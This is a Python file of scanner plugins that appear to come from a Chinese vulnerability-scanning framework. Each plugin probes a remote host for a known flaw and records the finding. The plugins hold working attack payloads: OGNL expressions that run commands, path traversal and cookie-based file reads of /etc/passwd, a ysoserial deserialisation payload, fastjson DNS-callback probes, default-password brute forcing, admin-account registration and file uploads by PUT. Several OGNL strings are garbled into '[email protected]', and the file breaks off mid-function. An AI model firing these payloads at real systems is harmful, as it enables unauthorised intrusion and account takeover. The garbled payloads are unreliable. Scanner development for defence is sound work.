def check(host, port=5601):
    """Probe *host* for an unauthenticated Kibana-style API (default port 5601).

    Two endpoints are requested (an Elasticsearch field-mapping proxy path and
    the saved-objects search). A finding is recorded with insert_vuln_db when a
    response has status 200 or 404 and contains one of the expected body
    markers. Returns ``(True, host, url, parsed_json)`` on a hit, ``False``
    otherwise, including when any exception is raised.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        '/elasticsearch/404adqweqw/_mapping/field/*?_=1569226048367&ignore_unavailable=false&allow_no_indices=false&include_defaults=true',
        '/api/saved_objects/_find?type=index-pattern&fields=title&per_page=10',
    ]
    hits = ['"type":"index_not_found_exception","reason', '"saved_objects":[']
    accepted_status = (404, 200)
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ('{}{}'.format(base, uri) for uri in uris):
                response = session.get(url, timeout=7, verify=False)
                if response.status_code not in accepted_status:
                    continue
                if not any(marker in response.text for marker in hits):
                    continue
                output = response.json()
                insert_vuln_db(host, url, output, plugin_id)
                return True, host, url, output
    except Exception:
        return False
    return False
def check(host, port=80):
    """Look for documentation PDFs exposed at well-known paths on *host*.

    Issues a HEAD request per candidate path and records a finding when the
    server answers 200 with a ``content-type`` containing ``application/pdf``.
    Returns ``(True, host, url, headers)`` on the first hit, ``False`` when
    nothing matches or an exception occurs.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        '/doc.pdf', '/help.pdf', '/wendang.pdf', '/api.pdf', '/web.pdf',
        '/dev.pdf', '/bangzhu.pdf', '/kaifa.pdf', '/帮助.pdf', '/说明.pdf',
        '/手册.pdf',
    ]
    hits = ['application/pdf']

    def looks_like_pdf(resp):
        # Only the advertised media type is inspected; the body is not fetched.
        content_type = str(resp.headers.get('content-type'))
        return resp.status_code in [200] and any(h in content_type for h in hits)

    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                response = session.head(url, timeout=7, verify=False)
                if looks_like_pdf(response):
                    output = response.headers
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
def check(host, port=80):
    """Test whether a user-registration API honours a client-supplied admin flag.

    One POST is sent to ``/api/users`` with ``has_admin_role`` set; a finding is
    recorded when the server answers 201 (account created) or 409 (the fixed
    username already exists). Because ``hits`` starts with the empty string,
    which is contained in every body, the status code is the effective filter.
    Returns ``(True, host, url, data)`` on a hit, ``False`` otherwise.
    Mitigation on the server side: role assignment must never be taken from the
    registration request body.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/api/users']
    # '' matches any response body; only the second entry is a real marker.
    hits = ['', 'username has already been used!']
    # Fixed registration payload; placeholder-looking values are part of the probe.
    data = {
        "username": "******",
        "email": "*****@*****.**",
        "realname": "opsbiu",
        "password": "******",
        "comment": "12",
        "has_admin_role": True
    }
    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.post(target, json=data, timeout=7, verify=False)
                for hit in hits:
                    if hit in response.text and response.status_code in [201, 409]:
                        output = data
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
def check(host, port=80):
    """Check a Hikvision device for the vendor default ``admin`` credentials.

    ``is_hikvision`` (defined elsewhere) gates the test. Each password in a
    short fixed list is tried via HTTP basic auth against
    ``/PSIA/Custom/SelfExt/userCheck``; a body containing
    ``<statusValue>200</statusValue>`` means the credentials were accepted.
    Returns ``(True, host, url, output)`` on a hit, ``False`` otherwise
    (including on any exception, which the bare ``except`` swallows).
    Mitigation: change factory credentials and restrict the web interface.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    try:
        if not is_hikvision(target):
            return False
        target = '{}/PSIA/Custom/SelfExt/userCheck'.format(target)
        users = ['admin']
        passwords = ['12345', '123456', '1234567', '00000']
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for password in passwords:
                for user in users:
                    response = session.get(target, timeout=7, verify=False, auth=(user, password))
                    if '<statusValue>200</statusValue>' in response.text:
                        # Output is "username:...\tpassword:...\n<body>" (labels in Chinese).
                        output = '用户名:{}\t密码:{}\n{}'.format(user, password, response.text)
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except:
        return False
    return False
def check(host, port=80):
    """Detect a local-file-read via the ``ROCK_LANG`` cookie on RockMongo.

    Two login paths are requested with a crafted cookie; the finding is
    recorded when the body contains ``root:x:0`` (start of an /etc/passwd
    line). Returns ``(True, host, url, body)`` on a hit, ``False`` otherwise
    or on any exception.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        '/index.php?action=login.index&host=0',
        '/rockmongo/index.php?action=login.index&host=0',
    ]
    marker = 'root:x:0'
    headers = {
        'Cookie': 'ROCK_LANG=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00',
    }
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                body = session.get(url, headers=headers, timeout=7, verify=False).text
                if marker not in body:
                    continue
                insert_vuln_db(host, url, body, plugin_id)
                return True, host, url, body
    except Exception:
        return False
    return False
def check(host, port=80):
    """Probe for an OGNL expression-evaluation flaw via the ``debug=browser`` query.

    A single crafted GET is sent; the request string is kept exactly as in the
    source. A finding is recorded when the body contains any of the markers
    typical of ``netstat -an`` output. Returns ``(True, host, url, body)`` on a
    hit, ``False`` otherwise or on any exception.
    Mitigation: disable debug/devMode in production and patch the framework.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        '/?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an'
    ]
    # Strings expected in netstat output on Windows and Linux hosts.
    hits = [
        'Active Connections', 'Active Internet connections', 'ESTABLISHED',
        'CLOSE_WAIT', 'TIME_WAIT'
    ]
    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target, timeout=10, verify=False)
                for hit in hits:
                    if hit in response.text:
                        output = response.text
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
def check(host, port=80):
    """Detect an exposed gadgets ``makeRequest`` proxy on an Atlassian product.

    Requests ``/plugins/servlet/gadgets/makeRequest`` with a ``url`` parameter
    pointing back at the scanned host and the ``X-Atlassian-Token: no-check``
    header. A finding is recorded when the body carries the
    ``IllegalArgumentException: Host name may not be null`` message.
    Returns ``(True, host, url, body)`` on a hit, ``False`` otherwise or on
    any exception.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    probe_uri = '/plugins/servlet/gadgets/makeRequest?url={}://{}:{}@'.format(scheme, host, port)
    uris = [probe_uri]
    markers = ['java.lang.IllegalArgumentException: Host name may not be null']
    headers = {'X-Atlassian-Token': 'no-check'}
    try:
        candidates = ['{}{}'.format(base, uri) for uri in uris]
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in candidates:
                body = session.get(url, timeout=25, headers=headers, verify=False).text
                if any(m in body for m in markers):
                    insert_vuln_db(host, url, body, plugin_id)
                    return True, host, url, body
    except Exception:
        return False
    return False
def check(host, port=443):
    """Out-of-band check of ``authService/config`` endpoints for JSON deserialisation.

    A payload naming ``java.net.InetAddress`` with a unique DNS name from
    ``get_dns_payload`` is POSTed to three API versions; after each attempt
    (even a failed one) ``have_record`` is consulted for a DNS callback.
    Returns ``(True, host, url, payload_dns)`` once a record is seen, ``False``
    otherwise or if the session itself fails.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    subdomain, payload_dns = get_dns_payload()
    uris = [
        '/3.0/authService/config',
        '/2.0/authService/config',
        '/1.0/authService/config',
    ]
    payload = {
        "c": {"@type": "java.net.InetAddress", "val": payload_dns},
        "b": {},
    }
    try:
        with requests.Session() as session:
            # Certificate verification is switched off for these requests.
            requests.packages.urllib3.disable_warnings()
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                try:
                    session.post(url, json=payload, timeout=5, verify=False)
                except:
                    pass
                finally:
                    # Checked after every request, regardless of its outcome.
                    if have_record(subdomain):
                        insert_vuln_db(host, url, payload_dns, plugin_id)
                        return True, host, url, payload_dns
            return False
    except:
        return False
def check(host, port=80):
    """Check a RockMongo login for the ``admin``/``admin`` default credentials.

    A form-encoded POST is sent to ``/index.php?action=login.index``; a body
    containing ``server.createDatabase`` indicates the authenticated console.
    Returns ``(True, host, url, body)`` on a hit, ``False`` otherwise or on any
    exception. Mitigation: change default credentials and restrict access.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/index.php?action=login.index']
    marker = 'server.createDatabase'
    form_body = "more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3"
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                response = session.post(url, headers=headers, data=form_body, timeout=7, verify=False)
                if marker in response.text:
                    output = response.text
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
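def check(host, port=6379):
    """Detect a Redis instance that answers ``INFO`` without authentication.

    Opens a TCP connection, sends ``INFO`` and reads up to 2048 bytes. A reply
    containing ``redis_version`` means the server is unauthenticated and a
    finding is recorded; a reply mentioning ``Authentication`` means auth is
    required. Returns ``(True, host, "host:port", reply)`` on a hit and
    ``False`` in every other case (the original fell through and returned
    ``None`` when neither marker was present).
    Mitigation: set ``requirepass`` / ACLs and bind Redis to internal interfaces.
    """
    try:
        with socket.create_connection((host, port), timeout=5) as conn:
            conn.send(b"INFO\r\n")
            # Undecodable bytes are dropped rather than raising.
            response = str(conn.recv(2048), 'utf-8', 'ignore')
            if 'redis_version' in response:
                target = "{}:{}".format(host, port)
                insert_vuln_db(host, target, "", plugin_id)
                return True, host, target, response
            # "Authentication" (auth required) or anything else: not a finding.
            return False
    except:
        return False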
def check(host, port=80):
    """Try weak username/password combinations against a phpMyAdmin login.

    Both the site root and ``/phpmyadmin/index.php`` are considered; each is
    skipped unless ``is_phpmyadmin`` (defined elsewhere) recognises it. The
    password list is every ``user + password`` concatenation of the two small
    lists below (the host's first label is included as a "user"). A fresh
    login token is fetched per attempt via ``get_token``; when none is
    returned the whole check returns ``False``. A 200 response whose body
    contains ``db_structure.php`` (and not ``login_form``) is treated as a
    successful login. Returns ``(True, host, url, output)`` on a hit, ``False``
    otherwise or on any exception. Mitigation: enforce strong passwords and
    restrict phpMyAdmin to trusted networks.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    urls = [target, '{}/phpmyadmin/index.php'.format(target)]
    try:
        for url in urls:
            if not is_phpmyadmin(url):
                continue
            simple_passwords = [
                '', '123', '1234', '12345', '123456', '!@#', '1111', '111',
                '666', '1314'
            ]
            simple_users = [
                '', 'root', 'test', 'admin', 'server', 'password', 'mysql',
                'ceshi', 'mima', host.split('.')[0]
            ]
            # Cartesian product: each "user" prefix joined with each password suffix.
            passwords = [
                '{}{}'.format(user, password)
                for user in simple_users for password in simple_passwords
            ]
            for user in ['root', 'test', 'server', 'ceshi']:
                for pwd in passwords:
                    token = get_token(url)
                    if not token:
                        # No token means no usable login form; abandon the whole check.
                        return False
                    data = {
                        "pma_username": user,
                        "pma_password": pwd,
                        "server": 1,
                        "token": token
                    }
                    requests.packages.urllib3.disable_warnings()
                    response = requests.post(
                        url, data, timeout=7,
                        headers={'Cookie': "pma_lang=zh_CN"})
                    if 'login_form' in response.text:
                        continue
                    elif response.status_code == 200 and 'db_structure.php' in response.text:
                        # Output is "username:...\t password:..." (labels in Chinese).
                        output = "用户名:{}\t 密码:{}".format(user, pwd)
                        target = url
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except:
        return False
    return False
def check(host, port=5901):
    """Detect a VNC server that accepts the ``None`` authentication type.

    ``check_anonymous`` (defined elsewhere) returns a flag and a client object;
    when the flag is set, ``auth("None")`` is attempted and the client is
    disconnected. An auth code of 0 is recorded as a finding. Returns
    ``(True, host, "host:port", output)`` on a hit, ``False`` otherwise or on
    any exception. Mitigation: require VNC authentication or tunnel the service.
    """
    target = '{}:{}'.format(host, port)
    try:
        anonymous_ok, client = check_anonymous(host, port)
        if not anonymous_ok:
            return False
        code, _msg = client.auth("None")
        client.disconnect()
        if code != 0:
            return False
        # Output text: "anonymous access enabled" (in Chinese).
        output = '开启匿名访问'
        insert_vuln_db(host, target, output, plugin_id)
        return True, host, target, output
    except:
        return False
def check(host, port=80):
    """Out-of-band check of the JBoss ``/invoker/readonly`` servlet for Java deserialisation.

    A ``JRMPClient`` payload built by ``Ysoserial`` (defined elsewhere) carrying a
    unique DNS name from ``new_dns_payload`` is POSTed; errors from the POST are
    ignored on purpose because the signal is the DNS callback checked by
    ``have_records``. Returns ``(True, host, url, payload_str)`` when a record
    exists, ``False`` otherwise. Mitigation: remove or firewall the invoker
    servlets and apply vendor patches.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}/invoker/readonly'.format(scheme, host, port)
    payload_str, payload_dns = new_dns_payload()
    payload = Ysoserial().generate(payload='JRMPClient', command=payload_dns)
    try:
        requests.post(target, data=payload, timeout=10)
    except:
        # Best effort: the request outcome is irrelevant, only the callback matters.
        pass
    results = have_records(payload_str)
    if results:
        output = payload_str
        insert_vuln_db(host, target, output, plugin_id)
        return True, host, target, output
    return False
def check(host, port=80):
    """Check a Joomla ``/index.php/component/users`` endpoint for injection echo.

    ``make_req`` and ``gen_pay`` (defined elsewhere) send a ``print_r`` payload
    containing a random 20-character string; if that string is echoed in the
    response the endpoint evaluated it. Returns ``(True, host, base_url,
    output)`` on a hit, ``False`` otherwise or on any exception.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    url = '{}/index.php/component/users'.format(base)
    canary = random_string(20)
    try:
        response = make_req(url, gen_pay('print_r', canary))
        if canary not in response:
            return False
        # Output labels (in Chinese): "verification string" / "response".
        output = '验证字符串: {}\n请求响应: {}'.format(canary, response)
        insert_vuln_db(host, base, output, plugin_id)
        return True, host, base, output
    except Exception:
        return False
def check(host, port=80):
    """Fingerprint a YApi instance via ``/api/project/swagger_url``.

    The endpoint is requested with an external ``url`` parameter; the exact
    JSON error ``{"errcode":40011,"errmsg":"请登录...","data":null}`` in the
    body identifies the service. Returns ``(True, host, url, body)`` on a
    hit, ``False`` otherwise or on any exception.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/api/project/swagger_url?url=http://www.baidu.com']
    signature = '{"errcode":40011,"errmsg":"请登录...","data":null}'
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                body = session.get(url, timeout=7, verify=False).text
                if signature in body:
                    insert_vuln_db(host, url, body, plugin_id)
                    return True, host, url, body
    except Exception:
        return False
    return False
def check(host, port=80):
    """Check whether the web server accepts HTTP ``PUT`` of a new file.

    A ``<timestamp>.txt`` resource is PUT with a JSON body and then fetched
    back; a finding is recorded only when the GET body equals the random
    ``file_content`` string. Returns ``(True, host, url, output)`` on a hit,
    ``False`` otherwise or on any exception.
    NOTE(review): the PUT body is the JSON object ``{"data": file_content}``
    while the comparison expects the bare string — confirm this is intended.
    Mitigation: disable PUT/WebDAV methods unless explicitly required.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    stamp = int(time.time())
    url = '{}/{}.txt'.format(base, stamp)
    try:
        file_content = '{}-{}'.format(random.random(), stamp)
        requests.packages.urllib3.disable_warnings()
        requests.put(url, json={'data': file_content}, timeout=7)
        fetched = requests.get(url, timeout=7).text
        if fetched != file_content:
            return False
        # Output text: "target allows HTTP PUT" (in Chinese).
        output = '目标开启 http PUT'
        insert_vuln_db(host, url, output, plugin_id)
        return True, host, url, output
    except:
        return False
def check(host, port=80):
    """Detect double-URL-encoded path traversal under ``/foo/default/master/``.

    One GET is sent; a body containing ``root:x:0`` indicates that
    ``/etc/passwd`` was served. Returns ``(True, host, url, output)`` on a
    hit, ``False`` otherwise or on any exception.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        "/foo/default/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd",
    ]
    marker = 'root:x:0'
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                body = session.get(url, timeout=7, verify=False).text
                if marker not in body:
                    continue
                # Output label (in Chinese): "/etc/passwd file contents:".
                output = '/etc/passwd文件内容:\n{}'.format(body)
                insert_vuln_db(host, url, output, plugin_id)
                return True, host, url, output
    except Exception:
        return False
    return False
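def check(host, port=80):
    """Look for application log files exposed at common paths.

    A HEAD to a path that cannot exist (``/loadg/biu404.log``) must not return
    200, otherwise the server answers everything and the check is skipped.
    For each candidate, a HEAD must return 200/301/302 without redirecting
    elsewhere, and a sibling ``/abc.log`` under the same name must not; then
    the body is fetched and accepted when it is longer than 10 bytes and looks
    neither like HTML nor JSON. Returns ``(True, host, url, body)`` on a hit,
    ``False`` otherwise or on any exception.

    Fixes versus the original: ``Content-Length`` is a header *string* (or
    absent), so ``> 10`` raised ``TypeError`` under Python 3 and the bare
    ``except`` turned every candidate into ``False``; the length is now parsed
    (falling back to the body size). Building ``content_type`` also added a
    possibly-``None`` header to a string; a single lookup on the
    case-insensitive header map is used instead.
    Mitigation: keep logs outside the web root and deny ``*.log`` in the server config.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    log_files = [
        'debug.log', 'web.log', 'app.log', 'init.log', 'test.log',
        'install.log', 'api.log', 'access.log', 'user.log', 'deploy.log',
        'error.log', 'npm-debug.log',
    ]
    php_paths = ['app/', 'application/', 'log/', '']
    uris = [
        '/{}{}'.format(php_path, log_file)
        for php_path in php_paths for log_file in log_files
    ]
    ok_status = [200, 301, 302]

    def body_length(resp):
        # Prefer the declared length; fall back to the bytes actually received.
        declared = resp.headers.get('Content-Length')
        if declared is not None and str(declared).strip().isdigit():
            return int(declared)
        return len(resp.content)

    def looks_like_log(resp):
        # Exclude HTML and JSON answers so that a catch-all page is not reported.
        content_type = str(resp.headers.get('Content-Type'))
        text = resp.text
        return (
            body_length(resp) > 10
            and '<div' not in text.lower()
            and 'html>' not in text
            and 'json' not in content_type
            and 'html' not in content_type
        )

    try:
        requests.packages.urllib3.disable_warnings()
        targets = ['{}{}'.format(base, uri) for uri in uris]
        sentinel = requests.head('{}/loadg/biu404.log'.format(base), timeout=7)
        if sentinel.status_code == 200:
            # Server returns 200 for nonexistent paths: nothing can be concluded.
            return False
        with requests.Session() as session:
            for url in targets:
                head = session.head(url, timeout=7)
                if head.status_code not in ok_status or head.url != url:
                    continue
                sibling = session.head(url.replace('.log', '/abc.log'), timeout=7)
                if sibling.status_code in ok_status:
                    continue
                response = session.get(url, timeout=7)
                if looks_like_log(response):
                    output = response.text
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except:
        return False
    return False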
def check(host, port=80):
    """Detect an unauthenticated Jolokia ``list`` endpoint.

    ``/jolokia/list`` and ``/actuator/jolokia/list`` are HEAD-probed; when the
    status is 200 or 302 the body is fetched and accepted if it names the
    ``ch.qos.logback.classic.jmx.JMXConfigurator`` MBean. Returns
    ``(True, host, url, body)`` on a hit, ``False`` otherwise or on any
    exception. Mitigation: require authentication for actuator/Jolokia endpoints.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/jolokia/list', '/actuator/jolokia/list']
    mbean_marker = 'ch.qos.logback.classic.jmx.JMXConfigurator'
    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                if session.head(url, timeout=7).status_code not in [302, 200]:
                    continue
                body = session.get(url, timeout=7).text
                if mbean_marker in body:
                    insert_vuln_db(host, url, body, plugin_id)
                    return True, host, url, body
    except Exception:
        return False
    return False
def check(host, port=80):
    """Detect an exposed ``composer.lock`` and report packages flagged by ``checkLock``.

    The file is fetched and parsed as JSON; the first entry of ``packages``
    must have a ``name`` key. ``checkLock`` (defined elsewhere) returns the
    findings; a non-empty result is recorded. Returns ``(True, host, url,
    findings)`` on a hit, ``False`` otherwise or on any exception (including
    non-JSON bodies). Mitigation: do not serve dependency manifests from the web root.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ["/composer.lock"]
    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                document = session.get(url, timeout=7).json()
                first_package = document.get('packages')[0]
                if 'name' not in first_package.keys():
                    continue
                findings = checkLock(document)
                if len(findings) == 0:
                    continue
                insert_vuln_db(host, url, findings, plugin_id)
                return True, host, url, findings
    except Exception:
        return False
    return False
def check(host, port=10250):
    """Detect a kubelet read-only/unauthenticated API via ``/runningpods``.

    Always uses HTTPS on the kubelet port; a 200 response whose body contains
    ``"kind":"PodList"`` is recorded. Returns ``(True, host, url, parsed_json)``
    on a hit, ``False`` otherwise or on any exception.
    Mitigation: enable kubelet authentication/authorization and restrict the port.
    """
    base = 'https://{}:{}'.format(host, port)
    uris = ['/runningpods']
    markers = ['"kind":"PodList"']
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                response = session.get(url, timeout=7, verify=False)
                matched = response.status_code in [200] and any(
                    m in response.text for m in markers)
                if matched:
                    output = response.json()
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
def check(host, port=80):
    """Detect expression-language evaluation in the Nuxeo login page path.

    ``/nuxeo/login.jsp/${233*2333}.xhtml`` is requested; the product ``543589``
    in the body shows the expression was evaluated server-side. Returns
    ``(True, host, url, body)`` on a hit, ``False`` otherwise or on any
    exception.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/nuxeo/login.jsp/${233*2333}.xhtml']
    expected = '543589'
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                body = session.get(url, timeout=7, verify=False).text
                if expected in body:
                    insert_vuln_db(host, url, body, plugin_id)
                    return True, host, url, body
    except Exception:
        return False
    return False
def check(host, port=80):
    """Check Solr cores for remote command execution via ``config`` / ``rce``.

    ``get_cores``, ``config`` and ``rce`` are defined elsewhere; for each core
    path the configuration step is applied and a ``dir`` listing is requested.
    The marker ``solr-webapp`` in the response indicates the command ran.
    Returns ``(True, host, core_url, body)`` on a hit, ``False`` otherwise or
    on any exception. Mitigation: restrict the Solr admin API and apply patches.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    hits = ['solr-webapp']
    try:
        uris = get_cores(host, port)
        if len(uris):
            targets = ['{}{}'.format(target, uri) for uri in uris]
            for target in targets:
                config(target)
                response = rce(target, 'dir')
                for hit in hits:
                    if hit in response.text:
                        output = response.text
                        # NOTE(review): unlike the sibling plugins this stores the
                        # URL (target) rather than output in the finding — confirm intended.
                        insert_vuln_db(host, target, target, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
def check(host, port=80):
    """Detect arbitrary template inclusion in ThinkCMF via ``templateFile``.

    ``/?a=display&templateFile=README.md`` is requested; a 200 response whose
    body contains ``ThinkCMF是一款`` (start of the README) is recorded.
    Returns ``(True, host, url, body)`` on a hit, ``False`` otherwise or on
    any exception.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/?a=display&templateFile=README.md']
    markers = ['ThinkCMF是一款']
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                response = session.get(url, timeout=7, verify=False)
                if response.status_code not in [200]:
                    continue
                if any(m in response.text for m in markers):
                    output = response.text
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
def check(host, port=80):
    """Detect a directly readable ``/WEB-INF/web.xml`` deployment descriptor.

    A 200 response containing ``</web-app>`` or ``</servlet-mapping>`` is
    recorded. Returns ``(True, host, url, body)`` on a hit, ``False``
    otherwise or on any exception. Mitigation: the container must never
    serve ``WEB-INF`` contents; check reverse-proxy path normalisation.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/WEB-INF/web.xml']
    markers = ['</web-app>', '</servlet-mapping>']
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                response = session.get(url, timeout=7, verify=False)
                if response.status_code not in [200]:
                    continue
                if any(m in response.text for m in markers):
                    output = response.text
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
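def check(host, port=80):
    """Out-of-band check of several JSON endpoints for deserialisation of ``@type``.

    A ``java.net.InetAddress`` payload carrying a unique DNS name from
    ``get_dns_payload`` is POSTed to each path; afterwards ``have_record``
    is consulted for a DNS callback. Returns ``(True, host, base_url,
    payload_dns)`` when a record exists, ``False`` otherwise or on any
    exception.

    Fix versus the original: the success path inserted the finding but fell
    off the end and returned ``None``, and the no-callback path also returned
    ``None``; both now return like the sibling plugins do.
    Mitigation: disable ``autoType``/polymorphic deserialisation of untrusted JSON.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    subdomain, payload_dns = get_dns_payload()
    uris = ['/', '/api', '/api/login', '/api/log', '/log']
    payload = {"@type": "java.net.InetAddress", "val": payload_dns}
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                session.post(url, json=payload, timeout=30, verify=False)
            if have_record(subdomain):
                # The finding is keyed on the base URL, as in the original.
                insert_vuln_db(host, base, payload_dns, plugin_id)
                return True, host, base, payload_dns
    except:
        return False
    return False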
def check(host, port=5984):
    """Detect a CouchDB "admin party" via ``/_session``.

    A 200 response whose body contains ``"roles":["_admin"]}`` means the
    anonymous session holds the admin role. The finding is stored with an
    empty output field; the parsed JSON is returned. Returns
    ``(True, host, url, parsed_json)`` on a hit, ``False`` otherwise or on
    any exception. Mitigation: create an admin account and require authentication.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/_session']
    markers = ['"roles":["_admin"]}']
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                response = session.get(url, timeout=7, verify=False)
                if response.status_code not in [200]:
                    continue
                if any(m in response.text for m in markers):
                    output = response.json()
                    insert_vuln_db(host, url, "", plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
def check(host, port=80):
    """Probe the site root for OGNL evaluation of the ``Content-Type`` header.

    A single GET carries the crafted header (kept exactly as in the source);
    the response body is checked for the marker ``biuframework`` that the
    expression would print. Returns ``(True, host, url, body)`` on a hit,
    ``False`` otherwise or on any exception. Note ``verify=False`` is used
    while the ``disable_warnings`` call is commented out, so urllib3 warnings
    will be emitted. Mitigation: patch Struts and filter malformed Content-Type.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    hits = ['biuframework']
    try:
        targets = [target]
        headers = {"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('biu'+'framework')).(#o.close())}"}
        #requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target, timeout=10, verify=False, headers=headers)
                for hit in hits:
                    if hit in response.text:
                        output = response.text
